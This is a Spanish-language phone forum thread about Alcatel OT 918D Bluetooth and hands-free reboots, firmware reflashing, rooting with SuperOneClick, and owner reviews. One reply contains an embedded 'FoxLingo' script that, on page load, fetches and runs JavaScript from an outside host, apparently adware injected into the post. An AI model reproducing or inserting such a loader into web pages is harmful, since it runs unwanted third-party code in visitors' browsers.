Alcatel OT 918D

Buenas @Breakk.

Ya he hablado con el concesionario y no hay actualizaciones para mi coche, de ningún tipo.

Así que nada, he hecho un hard reset y he vuelto a instalar el M0. Probaré estos días y ya te cuento qué tal.

Muchas gracias por todo.
 
Última edición por un moderador:
Vaya faena que este móvil tenga tantos problemas con el BT y el manos libres del coche en determinados modelos de Manos Libres...o en determinados modelos de nuestro terminal móvil (que también puede ser que el problema sea exclusivo de una determinada partida de teléfonos).

A mi, como dije, se me han frenado los reinicios (que era lo peor, porque claro, conduciendo no era plan de andar metiendo el PIN de las tarjetas a cada reinicio). Y los reinicios del móvil no tienen nada que ver con la actualización del firm del Manos Libres del coche. En este caso están los problemas de emparejamiento, que como dije en mi post se solucionaron bastante con la actualización del firm dada por el fabricante en su web.

Yo, como el compañero @breakk, opino que antes de tirar la toalla vuelvas a meterle la nueva versión del firm M0 al terminal, haciendo previamente un hard reset para que no te guarde ninguna configuración al meterle el nuevo firm.

@trompetaloco, estoy contigo en que es un coñazo resetear el fono, porque luego hay que volver a meterle todo de nuevo, pero quizás en eso esté la solución a los reinicios del terminal.

Por si te sirve de guia, y para evitarte muchos más cambios en el teléfono, yo haría lo siguiente:

-Reseteas completamente el teléfono para dejarlo en valores de fábrica.
-Metes el firm M0 siguiendo el tutorial para hacer root, en su paso nº 3
-Encender el teléfono, para que se configure idioma y demás según tus SIM
-Una vez configurados esos datos básicos (idioma, cuenta de gmail y poco más), apagas y le metes la versión del firm L0
-Enciendes el terminal, y una vez hecho, poniendo las opciones de Depuración, etc que se señalan en el manual de hacer Root, usas el SuperOneClick. Te debería hacer Root en un momento, sin necesidad de que tengas que cambiar el Recovery.
-Le instalas las app que quieras, y le quitas las que te parezcan (aunque mi consejo es que para esta prueba no quites mucho o mejor nada, por si alguna de las app eliminadas tiene relación con las radios del fono [de esto de las radios se habló en el post de los problemas del fono y el BT Parrot ya mencionado arriba]).
-Haz pruebas con el Manos Libres de tu coche, a ver si continuan los reinicios del móvil. Yo confío en que no sea así. Y ya con el resultado, si es bueno, le vas quitando las app que quieras. Si después se presentan los reinicios, ya puedes imaginar qué app de las eliminadas está provocando el fallo. Y si no se presentan, pues mejor. ;-)

Termino anotando otro fallo que le he encontrado al fono en estos días: la segunda SIM no coge cobertura en lugares donde se necesite UMTS. Así que aunque sea un movil Dual Sim, si viajas a países que no operen en las bandas corrientes, deja de ser Dual para convertirse en Mono y solo funciona la SIM 1 (lo mismo para voz que para datos). :-(
 
Última edición por un moderador:
Buenas noches/dias, amigos tengo el mismo problema, antes del fallo de mi x18i realizaba los enlaces perfectamente ya que le habia instalado un archivo el cual no recuerdo, como le hice flash, ahora ya no hace montaje de la segunda particion. si alguien sabe por favor diganme como. Gracias y Saludos
 
Buenas noches/dias, amigos tengo el mismo problema, antes del fallo de mi x18i realizaba los enlaces perfectamente ya que le habia instalado un archivo el cual no recuerdo, como le hice flash, ahora ya no hace montaje de la segunda particion. si alguien sabe por favor diganme como. Gracias y Saludos

Lo suyo es que comentes esto en el foro de móviles dualsim con android (no de marca). Ademas no se si te refiere al link2sd. En ese caso es culpa del nucleo android que no tiene preprarado para esto.
[h=2]Ruego te dirigas a este subforo.[/h]
Saludos.


<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>
 
Buenos días a todos,
Esta semana me he decidido a cambiar de movil y he estado informándome. Y luego me he dado cuenta que a alguien le podría interesar saber por qué cambio y dejo en un cajón para el resto de la historia, el Alcatel 918D.
En primer lugar decir que esto es algo que me ha pasado a mi y no tiene por qué pasar al resto, de hecho siento que no pueda leer todos los comentarios de este post pero bueno. Mi caso:
- Al año y 3 meses de andar la tarjeta, que la uso con 2 SIM desde el día cero, me empieza a fallar. Se apaga cuando quiera y se va "frenando"
- La memoria interna ya no da ni para las actualizaciones de WhatsApp u otras aplicaciones, se queda muy muy limitado
- He aguantado 6 meses, incluso volviendo a usar 2 aparatos y separando las 2 SIM, y algo de mejora noté, pero otra vez estamos igual.
- Va muy lento, se ha convertido en semejante patata que solo lo puedo usar para llamdas y con paciencia. Tarda en hacer cualquier cosa.
En fin, igual hay cosas que tienen solución, igual es el software etc etc. Pero ya le he cogido tal paquete que me cambio de modelo.
Si alguno necesita más info sobre la experiencia de usuario, encantado de comentar. Pero yo personalmente no quiero sabe nada de Alcatel en Dual SIM.
Que tengáis un buen día :blush:
 
Hola , en contestacion al anterior propietario de este movil decir que despues de 2 años y medio que lo tengo nada mas que puedo hablar de maravillas de él . Bien es cierto que despues de tanto tiempo, de instalar y desistalar programas, de no rootearlo, y de tanto uso que le he dado y le doy esta algo lento. A veces es muy lento pero otras es normal para las mismas aplicaciones. Si que es cierto que ya se me queda corta la memoria interna que tiene, pero eso si, es tan duro y dura tanto la bateria que aun lo voy a estirar un poco mas si me deja. Es duro por que no se ya la de golpes, caidas y agua que le ha caido y sufrido, y ha seguido funcionando como el primer día. Me tienta mucho los telefonos nuevos por prestaciones, pantallas, memoria,........pero gastarme un dineral para que con un toquecito se le rompa la pantalla, o que se le vaya la misma por que le da la gana como a los samsung S4, que no aguante el dia a dia de un currante; la verdad es que me hace estirarlo un poco mas.
La unica vez que le cambie el cristal de la pantalla fue por la caida que tuvo que rodo por toda la acera, se paro en la carretera y le pasó un coche por encima. Pense que tenia que recogerlo con pinzas pero mi sorpresa es que solo se le rompio la pantalla externa ( la del táctil ) . Igual me animo uno de estos dias en rootearlo haber si se le puede sacar mas al mismo pero con lo poco ducto que estoy en ello me hecha para atras el tema.
La bateria aun me dura para todo el dia con muchas llamadas, algo de thetering y algunos programas funcionando. ( Whatssup, Line,.....)
En el futuro nose si cambiare a otro Alcatel u otra marca, lo que si es que me volvere a dejar guiar por los consejos de webs como MovilesDualsim u otras que tambien aconsejan bien en el tema.
Buen y feliz dia a todos .
 

Del blog

¿Ha terminado la locura de añadir tantas cámaras a los móviles?

  • Si

  • No

  • No lo se

  • Ya me gustaría...

  • Ya te gustaría...


Los resultados solo son visibles tras votar.
Atrás
Arriba